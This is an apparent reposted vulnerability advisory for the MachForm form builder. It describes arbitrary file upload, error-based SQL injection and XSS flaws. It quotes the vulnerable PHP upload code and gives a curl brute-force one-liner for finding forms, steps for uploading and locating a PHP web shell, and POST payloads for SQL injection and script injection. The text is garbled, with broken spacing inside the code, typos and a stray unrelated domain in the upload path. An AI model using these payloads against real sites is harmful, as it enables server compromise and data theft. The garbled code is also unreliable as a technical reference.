######################################## ########### Title: machform form maker-Multiple Vulnerabilities # Author: Yashar shahinzadeh # developer: http://www.appnitro.com # Tested system n: Linux & Windows, PHP 5.2.9 # affected versions: 2 # Demonstration clip: http://y-shahinzadeh.ir/tutorial/machform.rar ######################################## ################# S Abstract: ========= 1. arbitrary File Upload 2. mySQL injection (Error based) and XSS 1. upload any file: ===================================== ...... if (! Empty ($ uploaded_files) {foreach ($ uploaded_files as $ element_name) {if (empty ($ form_review )) {// move file and check for invalid file $ destination_file = $ input ['machform _ data_path ']. DATA_DIR. "/form _ {$ form_id}/files/{$ element_name}-{$ record_insert_id}-{$ _ FILES [$ element_name] ['name']}"; if (move_uploaded_file ($ _ FILES [$ element_name] ['tmp _ name'], $ destination_file) {$ filename = mysql_real_escape_stri Ng ($ _ FILES [$ element_name] ['name']); $ query = "update ap_form _ {$ form_id} set $ element_name = '{$ element_name}-{$ record_insert_id}-{$ filename} 'where id =' $ record_insert_id '"; do_query ($ query) ;}} else {// for form with review enabled, append. tmp suffix to all uploaded files // move file and check for invalid file $ destination_file = $ input ['machform _ data_path ']. DATA_DIR. "/form _ {$ form_id}/files/{$ elemen T_name}-{$ record_insert_id}-{$ _ FILES [$ element_name] ['name']}. tmp "; if (move_uploaded_file ($ _ FILES [$ element_name] ['tmp _ name'], $ destination_file )) {$ filename = mysql_real_escape_string ($ _ FILES [$ element_name] ['name']); $ query = "update ap_form _ {$ form_id} _ review set $ element_name = '{$ element_name}-{$ record_insert_id}-{$ filename} 'where id =' $ record_insert_id' "; do_query ($ query);} if (! Empty ($ uploaded_file_lookup [$ element_name]) {unset ($ uploaded_file_lookup [$ element_name]) ;}}...... test exploitation: In beginning, the hacker must aim view. php located at the root of site, observing the lines inside of mentioned file wocould be a big lead to disclosure of vulnerability: $ input_array = ap_sanitize_input ($ _ POST ); $ submit_result = process_form ($ input_array); These two lines have functions leading to have both MySQL injection and Arbitrary file upload vulnerability. i'm not going to audit codes, I may just revoke strate the attack started by applying brute-force procedure on ID parameter so as to find a form consisting file upload form, it can be achieved by any program, I just issued a Linux command helped me find it properly: seq 1 500 | xargs-I XX-P32 curl-s http://target/view.php=XX -O XX. out grep "type = \" file \""*. out Afterwards, an HTML element followed by "for = "(. *) "must be specified, picture below gives better concept: http://blog.y-shahinzadeh.ir/posts-images/machform/7.jpg All have to be done is uploading PHP shell, and trying to find its name on server. The file will be uploaded in the path: http://www.bkjia.com /Data/form _ [ID]/[element name]-[mysql_insert_id ()]. php In URL above, [ID] is gathered in brute-force phase, [element name] is gathered by viewing HTML source, and [mysql_insert_id ()] shocould be brute-forced again. being relatively difficult, I 've recorded a clip demonstrating what I 've said: http://y-shahinzadeh.ir/tutorial/machform.rar 2. mySQL Injection (Error based) and XSS: ========================================================== = ...... $ input_array = ap_sanitize_input ($ _ POST );...... exploit (POST to view. php after finding HTML elements ): element_1 = 1 & element_2 = '& element_3 = 1 & form_id = 11 & submit = 1 element_1 = 1 & element_2 = % 27% 22% 28% 29% 26% 3 cScRiPt % 251% 3 eprompt % 20% 29% 3c % 2 fScRiPt % 3e & element_3 = 1 & form_id = 11 & submit = Enviar